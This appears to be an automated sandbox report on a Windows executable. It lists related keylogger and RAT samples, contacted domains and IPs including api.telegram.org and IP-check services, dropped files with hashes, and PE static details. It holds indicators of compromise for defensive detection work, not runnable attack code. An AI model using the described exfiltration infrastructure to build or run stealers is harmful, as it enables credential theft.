                                                                                                              YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  104.21.112.1QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.buyspeechst.shop/w98i/
                                                                                                                  wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                  • 838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
                                                                                                                  SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                  • beammp.com/phpmyadmin/
                                                                                                                  132.226.247.73fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  v3tK92KcJV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  MtxN2qEWpW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  New Order-090125.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • checkip.dyndns.org/
                                                                                                                  1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • checkip.dyndns.org/

                                                                                                                  Domains

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  checkip.dyndns.com9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 193.122.6.168
                                                                                                                  y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 193.122.130.0
                                                                                                                  FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 193.122.6.168
                                                                                                                  ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 132.226.8.169
                                                                                                                  CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 132.226.8.169
                                                                                                                  m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 193.122.6.168
                                                                                                                  FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 193.122.6.168
                                                                                                                  jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 158.101.44.242
                                                                                                                  fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 193.122.6.168
                                                                                                                  reallyfreegeoip.org9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.32.1
                                                                                                                  y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 104.21.80.1
                                                                                                                  FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 104.21.64.1
                                                                                                                  ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.32.1
                                                                                                                  m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.16.1
                                                                                                                  api.telegram.org9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220

                                                                                                                  ASNs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  TELEGRAMRU9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  UTMEMUSppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 132.226.8.169
                                                                                                                  CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 132.226.8.169
                                                                                                                  fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 132.226.8.169
                                                                                                                  eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 132.226.8.169
                                                                                                                  v3tK92KcJV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 132.226.8.169
                                                                                                                  MtxN2qEWpW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  CLOUDFLARENETUS9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.32.1
                                                                                                                  y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 104.21.80.1
                                                                                                                  AuKUol8SPU.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 104.21.48.233
                                                                                                                  FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 104.21.64.1
                                                                                                                  EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 172.67.137.47
                                                                                                                  ht58337iNC.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  • 172.67.152.246
                                                                                                                  wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 188.114.97.3
                                                                                                                  https://probashkontho.com/work/Organization/privacy/index_.htmlGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  psibx9rXra.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 23.227.38.74
                                                                                                                  ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 104.21.96.1

                                                                                                                  JA3 Fingerprints

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  54328bd36c14bd82ddaa0c04b25ed9ad9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.112.1
                                                                                                                  y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 104.21.112.1
                                                                                                                  FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 104.21.112.1
                                                                                                                  ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 104.21.112.1
                                                                                                                  CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.112.1
                                                                                                                  m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 104.21.112.1
                                                                                                                  FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 104.21.112.1
                                                                                                                  jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 104.21.112.1
                                                                                                                  fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.112.1
                                                                                                                  RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.112.1
                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0e9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  s2Jg1MAahY.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  MqzEQCpFAY.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  MqzEQCpFAY.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Users\user\AppData\Local\Temp\autCBDF.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\19d6P55zd1.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):134046
                                                                                                                  Entropy (8bit):7.938394396166148
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:MJzSl5c4c7xcZqPiqw5aKXipwkVxEBEZGfzM7OuirtDnH/Yc:N5cLu8a5z7mS7qvwwc
                                                                                                                  MD5:5244769C1FCF82429AD354C89DB61B2E
                                                                                                                  SHA1:551E77A8FCE240A6FFF60CC7A6EB58B57CA00BE7
                                                                                                                  SHA-256:25423180B5458649B23FF3B3E4B509FCD9D21EBFE246E6081FC88AB1C8D1982D
                                                                                                                  SHA-512:04B11A629267E52922FADB9D44CFED3E8F2446AFCC2667B80F932647E444CBD792F40720EBD27E149E76935A94CF737909D35A2EA39B05DABB2082105975B68B
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:EA06..2..E.S*.R.J...>w>.Z.M.....R.V@.JH..1.S.U@.\..~....C..*.O...w....|:y_...9..8..2..fyE.K'.J$.I..H.Wh...'.L.W....~.T...Y.A.t.......4.[R.V+...&.+..f...\s.i.f...E.`..:.T....:mJl.'...F..ZmJ`.+..N.V..j.h...Vj....H.4....P`.V.J.P....4.eP..~|."?@....z...W...R...*.T....u@....j..H.T.b...bE9.T..Ju...2 ..QT.~."`"%.MS.Ij..mx.U..*...B.P...".z........T.uj8.*M.4....V.W..y.@.T.U&.mV.gM..~..N.....T,...W..}Fm_.P...$..!..DH...... .RF.T].....*.T&@.E..P....`.Bl..I...x.IJ.^-SI......V.MZ{S.........i.j..J.rj.z..j.U'..L.cI...5J.(.D.....{mU.M&.xD...S)5id..0.T*.]u~e1..c...".s.M.3...W.Qi.I.Z....T:MZgy...u......~$..R...*..u2...T(...2..,4..._..)W..r.4..I.....H...$..IZ.T).....L.U)T..Z;M..(5....h.H@...R.h......:.v.P.*.5J1{.ViT..r...L).I.R.4...p#r.I.Ee.y.:......`..S...J.t*@...is.R.....G2.../^...z..j..U..7..@..gyJ.N.w..fU..i)1...Im..(..J.q.R.T9%R.1.Y.@,..w1..&W8U*.a...s..2.)..)S..&_h..,....Qm.T/.*.*e........c.Mop..R......_J..T...]l..(.M*sz(.10..g...w.1.l)..0.m2.t@T.D.|..S6...Bi

                                                                                                                  C:\Users\user\AppData\Local\Temp\uppishly

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\19d6P55zd1.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):274944
                                                                                                                  Entropy (8bit):6.984890432524203
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:rMURVGYIdzpxqPq1dUMFiYYYlUvoniAPw+erznQS7:rMURVWpUPq0YGwnibfQS7
                                                                                                                  MD5:336C7938326638A85120F1D1E3788AB9
                                                                                                                  SHA1:1015B7427E0FEED7C51C1A2D14F8DD25CC092452
                                                                                                                  SHA-256:8AF5D305B73BC5E8BBD23AE0AF4F9C3F06E502FDE3F2DCEF4FD89F56B17E9CB2
                                                                                                                  SHA-512:F185B3F83C8B8784BB3B46058A64F5B0316F466B67D8F259CD4289F8C5CDFCA6BBB66111F0A889D480BA7A291BDF6F2B4D8AB3541D67B0C2D8C6AF55D5FB724A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:|..2ZTJJMV7S..NZ.6PJ41MRrYTJJIV7S10NZT6PJ41MR2YTJJIV7S10NZT6.J41CM.WT.C.w.R}.o.<_#jDC"5@89j)(8Y<E.,?tD%$.X#rv..j'&2R}<=D~T6PJ41M.wYT.KJV..VNZT6PJ41.R0X_K.IV+W10ZZT6PJ4.tV2YtJJI.3S10.ZT.PJ43MR6YTJJIV7W10NZT6PJ.5MR0YTJJIV5Sq.NZD6PZ41MR"YTZJIV7S1 NZT6PJ41MR2.mNJ.V7S1pJZC&PJ41MR2YTJJIV7S10NZ42PF41MR2YTJJIV7S10NZT6PJ41MR2YTJJIV7S10NZT6PJ41MR2YTJJIv7S90NZT6PJ41MR:yTJ.IV7S10NZT6Pd@T5&2YTNPMV7s10NFP6PH41MR2YTJJIV7S1.NZ4."9FRMR2NDJJI.3S1"NZT(TJ41MR2YTJJIV7.10.t&S<%W1M^2YTJ*MV7Q10NjP6PJ41MR2YTJJI.7Ss0NZT6PJ41MR2YTJJ.o3S10NZ.6PJ61HR..VJ^.W7P10N.T6V..3M.2YTJJIV7S10NZT6PJ41MR2YTJJIV7S10NZT6PJ41MR2.).E...:B..ZT6PJ40OQ6_\BJIV7S10N$T6P.41M.2YT}JIV.S10#ZT6tJ413R2Y*JJI27S1BNZTWPJ4vMR26TJJ'V7SO0NZJ4xj41Gx.YVbkIV=S..=xT6Z.51MVAzTJ@.T7S5CjZT<.I41I!.YT@.MV7WB.NZ^.UJ45g.2Z.\LIV,<.0NPT5._21MI..THbsV7Y1.hZW.EL41Vx.YV.CIV3ygCSZT0x.41G&;YTH.CV7W..Lr.6P@..3Y2YPaJctI_10JqT.r491MV.Y~TH.[7S5.l$Z6PN.1gpLVTJNbV.M3.AZT2zhJ!MR6rT`h7G7S5.NpvHBJ45fR.{*YJIR.S..0NT6Ta4.o,'YTNaI|.-'0N^.6zhJ&MR6rT`h7N7S5.NpJ4.R41Ix4s6J8.C7#2

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):6.987914983030458
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:19d6P55zd1.exe
                                                                                                                  File size:1'048'576 bytes
                                                                                                                  MD5:13e4d4a655db53282e89478eb1fdd462
                                                                                                                  SHA1:1b72c5e4e03807aa857f095db92a76e36fd2b0cd
                                                                                                                  SHA256:9843d3697d4998e63df6e33939a163e4ebe4f3a8f50f292508992b16680950e5
                                                                                                                  SHA512:01e08a87f0f26fdac2854945e55f37fb1215e7b4b2cff85575b590c4a75a6e77e35d941897bdb2f782a418a15410ebd48916a79a4e0774ec3407673d443bd2d1
                                                                                                                  SSDEEP:24576:qu6J33O0c+JY5UZ+XC0kGso6Faj2n7pbWY:cu0c++OCvkGs9FajW7gY
                                                                                                                  TLSH:1525BE2273DDC360CB669173BF69B7016EBF7C614A30B95B2F880D7DA950162162C7A3
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                                                                  File Icon

                                                                                                                  Icon Hash:aaf3e3e3938382a0

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x427dcd
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x675AC211 [Thu Dec 12 10:59:29 2024 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  call 00007FAA78B8770Ah
                                                                                                                  jmp 00007FAA78B7A4D4h
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push edi
                                                                                                                  push esi
                                                                                                                  mov esi, dword ptr [esp+10h]
                                                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                                                  mov eax, ecx
                                                                                                                  mov edx, ecx
                                                                                                                  add eax, esi
                                                                                                                  cmp edi, esi
                                                                                                                  jbe 00007FAA78B7A65Ah
                                                                                                                  cmp edi, eax
                                                                                                                  jc 00007FAA78B7A9BEh
                                                                                                                  bt dword ptr [004C31FCh], 01h
                                                                                                                  jnc 00007FAA78B7A659h
                                                                                                                  rep movsb
                                                                                                                  jmp 00007FAA78B7A96Ch
                                                                                                                  cmp ecx, 00000080h
                                                                                                                  jc 00007FAA78B7A824h
                                                                                                                  mov eax, edi
                                                                                                                  xor eax, esi
                                                                                                                  test eax, 0000000Fh
                                                                                                                  jne 00007FAA78B7A660h
                                                                                                                  bt dword ptr [004BE324h], 01h
                                                                                                                  jc 00007FAA78B7AB30h
                                                                                                                  bt dword ptr [004C31FCh], 00000000h
                                                                                                                  jnc 00007FAA78B7A7FDh
                                                                                                                  test edi, 00000003h
                                                                                                                  jne 00007FAA78B7A80Eh
                                                                                                                  test esi, 00000003h
                                                                                                                  jne 00007FAA78B7A7EDh
                                                                                                                  bt edi, 02h
                                                                                                                  jnc 00007FAA78B7A65Fh
                                                                                                                  mov eax, dword ptr [esi]
                                                                                                                  sub ecx, 04h
                                                                                                                  lea esi, dword ptr [esi+04h]
                                                                                                                  mov dword ptr [edi], eax
                                                                                                                  lea edi, dword ptr [edi+04h]
                                                                                                                  bt edi, 03h
                                                                                                                  jnc 00007FAA78B7A663h
                                                                                                                  movq xmm1, qword ptr [esi]
                                                                                                                  sub ecx, 08h
                                                                                                                  lea esi, dword ptr [esi+08h]
                                                                                                                  movq qword ptr [edi], xmm1
                                                                                                                  lea edi, dword ptr [edi+08h]
                                                                                                                  test esi, 00000007h
                                                                                                                  je 00007FAA78B7A6B5h
                                                                                                                  bt esi, 03h
                                                                                                                  jnc 00007FAA78B7A708h

                                                                                                                  Rich Headers

                                                                                                                  Programming Language:
                                                                                                                  • [ASM] VS2013 build 21005
                                                                                                                  • [ C ] VS2013 build 21005
                                                                                                                  • [C++] VS2013 build 21005
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                  • [ASM] VS2013 UPD4 build 31101
                                                                                                                  • [RES] VS2013 build 21005
                                                                                                                  • [LNK] VS2013 UPD4 build 31101

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x37614.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xff0000x711c.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rsrc0xc70000x376140x3780025ca859e3d631f2e46a6b993b1ddc2eeFalse0.8800191793355856data7.7797751085790114IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0xff0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                  RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                  RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                  RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                  RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                  RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                  RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                  RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                  RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                  RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                  RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                  RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                                                                  RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                  RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                  RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                  RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                  RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                  RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                  RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                  RT_RCDATA0xcf7b80x2e8dbdata1.0003461241956546
                                                                                                                  RT_GROUP_ICON0xfe0940x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                  RT_GROUP_ICON0xfe10c0x14dataEnglishGreat Britain1.25
                                                                                                                  RT_GROUP_ICON0xfe1200x14dataEnglishGreat Britain1.15
